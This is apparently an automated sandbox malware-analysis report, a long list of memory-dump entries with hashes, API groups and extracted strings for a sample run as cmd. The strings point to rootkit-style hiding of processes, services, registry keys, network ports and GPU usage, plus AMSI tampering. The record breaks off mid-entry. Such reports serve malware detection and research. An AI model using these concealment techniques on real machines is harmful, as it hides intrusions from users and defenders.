                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 2436724071-0
                              • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                              • Instruction ID: 3bc227a5684101ec9e2c68f0333c7808447b48c62877aa9a72c84e4be7076e10
                              • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                              • Instruction Fuzzy Hash: C681F962324680A5FF20EFB5E66836EBF91E745798F044115EE9D4BBA9DF38C4A18700
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: 4cedc39b514f19843c9bdcdc6ed9f2f92d6b011fe91a767adbbe362769053391
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: 89B1A022210790A2EFA8AFA5D5187A9BBE4F744BACF045026EE0D5B794DF35DDE0C740
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                              • Instruction ID: f4c40b9c64bc3898efb103a0b48a6f98a75362c4add2de227f5c03a3a9a542a8
                              • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                              • Instruction Fuzzy Hash: 52A1C522714680A9FF20ABB5E8483AD7FF1E781B9CF144115DE9D2F695DA38D4E68700
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                              • Instruction ID: 6177448400d7ba4cbe306044c28fcaf71f7842219b15ea7942b4dec437c2c88c
                              • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                              • Instruction Fuzzy Hash: 4981D96230068065EF20EFA2E44839EBFE1E785B98F544525EE9D4F7D5DF38D0A18700
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                              • Instruction ID: 766d32c59a56e53c74f1ed7200c442cd3322c5d57ff7fc30510cfbcfc356adc3
                              • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                              • Instruction Fuzzy Hash: C51161B1754694EBFFA9AF69A45A3293BD5F389388F448029D44D8EA94C73DC4F08F04

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: 5d37a0c685110da076ab4605ade1792d07ea55b25189914f174853be19274093
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 8A715E6A320A40E6EF10EFA6E8986993B78FB84B9CF451111DD4D5B72CDF34C8A4C740

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: 080ff768466fe520258121575b6818bb3b880ed551ff155cd3559e839e5e88ee
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: E271E9A6220A51E6EF20BFB6E9586993BB4FB84B8CF405111DD4D5BB7CDE38C4A4C740

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: be69f8292aea042b5e43eb4ac712a50161521e291cbbba5b84fe03091685efff
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: 5E517BA0134A8AB9EF04FBE4EE4A6D43F60A74474DF8049539C4D0A57DDE7882FAC781

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: ad13465836221ed923f9e3632f7fd434756f47bfc4f7883396bacacb7218285a
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: 37515C72220B84E6EB65DFA2E44835A7BA5F788F98F454124DE4E5B72CDF3CC4A58700

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: 9416425dfeb720b221a80741509fc01688272a48952da9b9feb7ab4632517e40
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: F3510E72624B84E6EB54EFA2E55835A7BA1F788F98F444124DE4D4BB68DF38C095C700

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: 6833dc8272e2a0ad8e4b41580b55823730c644dd1f92ed6e1ffa8d5ae0fb52aa
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: 5851C92172174461EE55BBD6D8083663B54B748BB8F4807259D3E4F3D8DF38D5E9C640

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: 41cf1ac18fc09d1f60949655d5ebda905458326e5d67a8f867ad28ba186d02b4
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: AF51CB6272174461EE14BBE6E6083A53B50B748BB8F4807259D7E0B7E8DF38D4A9C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: da6139e6fb9f655a8c9e95cbbf9badde996b7a70173956fadf0adfb1eced0cb6
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 7331CA22620A40E6EF21EF92A88C75AB7A4F748BD9F450615DD4D5F62CDF38C8A68740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: 91592e1c37c13655c8d3d30bcd9abe2dad49406d5c6fae7fb35999eed484668c
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 6231B862620A40E6EF21EFA2E94C759B7A0F748BD9F444515DD4D4BB3CDF38C4A58740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: b521ccbab354a8479b7a3fd15a7b093f633a2fa3eb72d141a86a4a5855f2357f
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: 27318421620F41E6EF51EF92A48875A7BA4B784F98F454125DE4E5B768DF38C8A1C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: ecb0381640c0a2a583d32085e1d0002ed1ac5438ea9275369c0eb4d86286f311
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: C3316661620B41E6EF11EFA2E5887597BE0BB84F98F444125DE4E4B738EF38C8A5C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: 24f681061a3e6246a95a636a5f3a31ffd245458c44839c90a10969825098483f
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: 91D16E72624780AAFF20EBA5D44839D7BA8F75579CF100215EE8D5BBA9DB38C4E1C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction ID: 3c86197f5f703cdd3fc01469f3f12610a4217abfafb8882004ceccf518629907
                              • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction Fuzzy Hash: 3ED17B32614780AAEF60AFA5D4883AD7BE1F78579CF100115EE8D5BB9ADB34E4E1C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction ID: 830792ead4b74612dbe2a56751b57a494cc6b5297b80a0d6cd8c59b254b0ce05
                              • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                              • Instruction Fuzzy Hash: A7D16EB2A247809AFF20ABB5D64839D7BA4F74579CF100115EE8D5BBA9DB38C4E1C701
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: 6ed320e0c140f8f6d5934df7a4d03878a02c08582cd3e0acd6714a3e8994480e
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: E0418073224B80DAEBA4DF61E44839A7BA5F388B98F448119DE8D0B75CDF38C495CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                              • String ID: d
                              • API String ID: 3743429067-2564639436
                              • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction ID: b746889e9b512cdc627c002f2ce9b9604aae39da49f69c11c56c24190265a741
                              • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                              • Instruction Fuzzy Hash: C0415172224B84D6EB60DFA1E54839A7BB1F388B98F448115DE890BB6CDF38C495CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                              • String ID: \\.\pipe\$rbx-childproc
                              • API String ID: 166002920-1828357524
                              • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction ID: 673562c5418f69beaa3eed2ebe839a3604995ae4b12214ed1dddbaf41d4f6b6c
                              • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                              • Instruction Fuzzy Hash: 2A114F36624B40D3EB10DBA1F4183597B61F389BE8F944315EE9D1AAA8CF3CC594CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
